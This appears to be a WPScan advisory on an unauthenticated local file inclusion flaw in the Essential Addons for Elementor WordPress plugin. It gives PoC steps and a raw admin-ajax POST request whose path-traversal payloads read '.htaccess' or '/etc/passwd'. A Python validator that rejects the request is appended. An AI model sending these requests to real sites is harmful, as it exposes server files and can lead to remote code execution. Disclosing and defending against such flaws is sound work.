wpvulndb | Wai Yan Myo Thet | WPVDB-ID: 0D02B222-E672-4AC0-A1D4-D34E1ECF4A95
History: Jan 31, 2022 - 12:00 a.m.

Essential Addons for Elementor < 5.0.5 - Unauthenticated LFI

2022-01-31 00:00:00
Wai Yan Myo Thet
wpscan.com

EPSS: 0.002 (Low)
EPSS Percentile: 55.0%

The plugin does not validate and sanitise some template data before using it in include statements, which could allow unauthenticated attackers to perform a Local File Inclusion attack and read arbitrary files on the server. This could also lead to RCE via user-uploaded files or other LFI-to-RCE techniques.

PoC

- Create a simple page and edit it with Elementor
- Add a Post Grid with the Show Load More option enabled (in the Layout Settings section of the widget; default is disabled)
- As an unauthenticated user, navigate to that page and intercept the request made when clicking the Load More button
- Change the template_info[file_name] parameter to a payload such as ../../../../../../.htaccess or ../../../../../../../../etc/passwd (the template_info[name] parameter is also vulnerable)

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 396
Connection: close

action=load_more&class=Essential_Addons_Elementor%5CElements%5CPost_Grid&args=orderby%3Ddate%26order%3Ddesc%26ignore_sticky_posts%3D1%26post_status%3Dpublish%26posts_per_page%3D4%26offset%3D0%26post_type%3Dpost&page=2&page_id=5512&widget_id=19f1b2c&nonce=7c9c8da06d&template_info%5Bdir%5D=lite&template_info%5Bfile_name%5D=..%2f..%2f..%2f..%2f..%2f..%2f.htaccess&template_info%5Bname%5D=Post-Grid

The ajax_eael_product_gallery AJAX action (Product Grid widget) is also affected.
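As an added example (not the plugin's code and not part of the advisory), the following Python mirrors the check a hardened handler should apply to the template_info parameters before any include: parse the admin-ajax body, require plain identifiers for dir, file_name and name, and confirm the normalised path still sits under the templates root. The templates root path, the `.php` suffix and the benign template name `default` are assumptions.

```python
import re
from pathlib import Path
from urllib.parse import parse_qs

# Only plain identifiers are accepted as template directory and file names.
SAFE_SEGMENT = re.compile(r"^[A-Za-z0-9_-]+$")

# Assumed templates root; stands in for the plugin's own template directory.
TEMPLATES_ROOT = Path("/srv/wp/plugins/essential-addons/templates")

# Request body from the PoC above (traversal in template_info[file_name]).
POC_BODY = (
    "action=load_more&class=Essential_Addons_Elementor%5CElements%5CPost_Grid"
    "&page=2&page_id=5512&widget_id=19f1b2c&nonce=7c9c8da06d"
    "&template_info%5Bdir%5D=lite"
    "&template_info%5Bfile_name%5D=..%2f..%2f..%2f..%2f..%2f..%2f.htaccess"
    "&template_info%5Bname%5D=Post-Grid"
)
# Constructed benign request; 'default' is an assumed template name.
BENIGN_BODY = (
    "action=load_more&template_info%5Bdir%5D=lite"
    "&template_info%5Bfile_name%5D=default&template_info%5Bname%5D=Post-Grid"
)


def extract_template_info(body: str) -> dict:
    """Return the decoded template_info[...] fields of a urlencoded body."""
    info = {}
    for key, values in parse_qs(body, keep_blank_values=True).items():
        m = re.fullmatch(r"template_info\[(\w+)\]", key)
        if m:
            info[m.group(1)] = values[0]
    return info


def resolve_template(info: dict, root: Path = TEMPLATES_ROOT):
    """Return the path to include, or None if any field is unsafe."""
    # Check 1: each field must be a plain identifier, so '..', '/' and
    # their percent-encoded forms are rejected before any path is built.
    for field in ("dir", "file_name", "name"):
        if not SAFE_SEGMENT.fullmatch(info.get(field, "")):
            return None
    # Check 2: the normalised path must still sit below the templates root.
    candidate = (root / info["dir"] / f"{info['file_name']}.php").resolve()
    if root.resolve() not in candidate.parents:
        return None
    return candidate
```

Running `resolve_template(extract_template_info(POC_BODY))` returns None, while the benign body resolves to lite/default.php under the templates root.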
